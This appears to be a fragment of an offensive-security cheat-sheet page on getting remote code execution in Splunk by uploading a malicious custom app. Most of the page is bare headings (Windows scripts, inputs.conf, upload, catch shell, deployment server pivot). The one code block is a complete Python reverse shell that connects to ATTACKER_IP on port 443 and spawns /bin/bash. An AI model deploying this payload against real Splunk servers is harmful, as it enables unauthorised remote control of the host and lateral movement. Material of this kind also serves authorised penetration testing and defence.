Splunk
Discovery
Custom App RCE (Authenticated)
Create Malicious App Structure
mkdir -p splunk_shell/bin splunk_shell/defaultLinux - rev.py
import sys,socket,os,pty
ip="ATTACKER_IP"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')Windows - run.ps1
Windows - run.bat
inputs.conf
Package and Upload
Catch Shell
Deployment Server Pivot
Pre-built Reverse Shell Package
Last updated